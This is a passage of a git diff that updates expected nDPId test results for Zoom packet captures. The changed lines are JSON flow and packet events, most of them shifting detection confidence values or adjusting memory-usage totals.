+00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569520471915,"flow_last_seen":1569520473157,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1569520469341,"flow_last_seen":1569520469413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5783,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1569520471189,"flow_last_seen":1569520473190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":57752,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":700,"packets-processed":697,"total-skipped-flows":0,"total-l4-payload-len":329478,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":31,"total-detection-updates":23,"total-updates":0,"current-active-flows":0,"total-active-flows":33,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":211,"global_ts_msec":1569520473198} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 700/697 @@ -217,9 +217,9 @@ ~~ total active/idle flows...: 33/33 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6063283 bytes -~~ total memory freed........: 6063283 bytes -~~ total allocations/frees...: 119019/119019 +~~ total memory allocated....: 6196917 bytes +~~ total memory freed........: 6196917 bytes +~~ total allocations/frees...: 121781/121781 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 187 chars ~~ json string max len.......: 2328 chars diff --git a/test/results/zoom2.pcap.out b/test/results/zoom2.pcap.out index 3b4e2f586..7cafc5787 100644 
--- a/test/results/zoom2.pcap.out +++ b/test/results/zoom2.pcap.out 
@@ -4,9 +4,9 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642965458402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1642965458402,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngDAqAGykMNJmsOcAbton\/9jAAAAALAC\/\/+GrAAAAgQFtAEDAwUBAQgKBNjhZQAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642965458577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642965458577,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGrQSQw0mawKgBsgG7w5wp5A9SaJ\/\/ZKASqbBcNQAAAgQFrAQCCApc+vuKBNjhZQEDAww="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642965458577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642965458577,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGngzAqAGykMNJmsOcAbton\/9kKeQPU4AQECwj1wAAAQEICgTY4hFc+vuK"} 
-01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} 
+01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965459595,"flow_last_seen":1642965459595,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1642965459595,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1642965459595,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459595,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXeHsAAEARZSPAqAGykMNJmuztImEAgzNnAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hPwBvYT8AAABA5tdm9ZTyTIyTAkYLAufeKJLgneU8bl8DozakMMlr\/JDYAlm5+8RxsTcW0dGDYHnKojsP3MD2C2S9PgF8PPhtdgAAAAAAQABAAAB1MAABAAMAAiAA"} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1642965459696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459696,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXZlQAAEARd0rAqAGykMNJmuztImEAg30SAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hpABvYaQAAABASNx7XNkhaVV2TkWPa7HXWfzTaegL7lyuofS42ADMsef1ZS+nG51oqDil0vt0Fn4zbdXfyiCV8oAbYGEn4LlcKwAAAAAAQABAAAB1MAABAAMAAiAA"} 
@@ -27,14 +27,14 @@ 00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460359,"flow_last_seen":1642965461085,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":2012,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1642965461085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1642965500049,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500049,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4064AAEABCl\/AqAGykMNJmgMD9zUAAAAARQAAdCt\/QAAxEYFCkMNJmsCoAbIiYeMFAGAAAA=="} 
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","ndpi": {"confidence": 